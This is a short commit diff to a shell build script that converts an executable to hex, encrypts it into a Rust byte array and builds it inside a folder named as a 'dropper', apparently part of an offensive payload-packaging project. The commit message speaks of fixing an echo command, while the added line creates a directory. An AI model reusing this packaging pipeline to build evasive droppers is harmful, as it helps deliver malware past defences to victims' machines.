Fix echo command to display success message

This commit is contained in:
S3N4T0R
2026-03-10 13:55:31 -04:00
committed by GitHub
parent e13600da2a
commit ebc979f026
@@ -39,6 +39,7 @@ xxd -p "$OUTPUT_EXE" | tr -d '\n' > "$HEX_FILE" || { echo "Error: failed to crea
# 5. Encrypting the hex file and converting it to a Rust array
echo "Running encryption script..."
mkdir -p "$DROPPER_DIR/src"
python3 "$ENCRYPT_SCRIPT" > "$DROPPER_DIR/src/$RUST_ARRAY_FILE" || { echo "Error: encrypt.py failed" >&2; exit 1; }
# 6. Move to the dropper folder to build the final file